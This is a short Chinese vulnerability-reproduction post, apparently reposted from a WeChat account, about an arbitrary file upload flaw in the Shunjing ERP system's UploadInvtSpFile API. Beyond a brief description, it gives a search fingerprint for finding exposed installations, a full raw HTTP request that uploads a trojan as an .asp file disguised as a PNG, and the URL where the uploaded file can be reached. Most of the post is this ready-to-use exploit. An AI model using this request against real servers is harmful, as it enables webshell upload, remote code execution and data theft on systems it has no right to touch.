顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
首页
bp发包
文件链接:地址/InvtSpFiles/返回的值
body="/api/DBRecord/getDBRecords"
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1 Host: 地址 Content-Type: multipart/form-data; boundary=-----------------1111 Content-Length: 152 -------------------1111 Content-Disposition: form-data; name="filedata"; filename="1.asp" Content-Type: image/png 木马内容 -------------------1111--
原文始发于微信公众号(我吃饼干):【漏洞复现】顺景ERP存在UploadInvtSpFile任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论